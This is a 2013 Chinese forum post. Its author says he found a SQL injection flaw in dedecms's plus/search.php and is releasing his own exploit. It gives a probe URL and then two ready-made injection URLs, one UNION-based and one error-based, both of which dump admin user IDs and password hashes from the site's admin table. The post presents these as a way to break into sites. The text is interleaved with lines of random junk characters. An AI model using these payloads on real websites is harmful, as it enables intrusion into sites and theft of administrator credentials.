转载不加作者名的没JJ
/ O5 l9 ]( t/ Q3 k4 |8 k# b" |
* Y. \' q8 Q" [0 O- K哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
$ `6 D9 _7 u, P0 p3 @: Y
0 c) A5 }5 z, J: x6 P既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
* u4 v q" G- A: `
. |5 [0 h: H: X, O8 [( x4 F2 V我一般是这样测试的:" I3 [! N$ _# q2 U) D; q- n
. |% K/ a$ {* L' \9 T5 g; ?
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a/ D. f! E* u9 p
, y5 c6 v% b3 W
转载不加作者名的没JJ
/ a" L5 ?" ^0 O9 U, J. u! @
- {1 P, H2 W* z# D作者:鬼哥
: ^4 h" A* ~* p1 F) Q" w0 \( W; \
) m3 Z/ M/ M. Y4 e6 s( P3 `6 G
" f% v( O( T( E看结果如果提示/ L5 E9 A0 S8 S7 D
4 `9 z2 a/ }9 b" j. V4 ? U* u$ J5 \
Safe Alert: Request Error step 2 !; z% y! o' B- {; } ]
* a" A7 I6 K% H
那么直接用下面的exp
& B* X. q8 ^9 R/ L; b% a9 K0 e8 K) G9 |) s- V4 k
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a& W6 A- M% i3 K0 C! @
4 |0 p# `2 X' t$ r4 X. S% u9 O# M5 O( Y/ r5 j3 N# O
看结果如果提示
7 J" S8 {$ a* u' o6 o. J3 e+ u1 ]6 n0 V. r% V) }$ v0 J
Safe Alert: Request Error step 1 !: f6 o7 I8 F4 ^! P! O$ Y
7 m7 B- {; [& `( B9 s
那么直接用下面的exp
; X1 w0 Z7 T. \: u4 @
9 }0 W/ f9 m( u, S5 E* U6 q- Lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
" b$ [. p' Z3 h/ w D" s4 ~* i' I, ~ F) H) m2 ~) @
8 \0 B- D3 m4 h如果正常显示证明漏洞不存在了。+ r$ t/ t* k: k& L; t+ g
# ^- |# f( W. q% j/ x转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对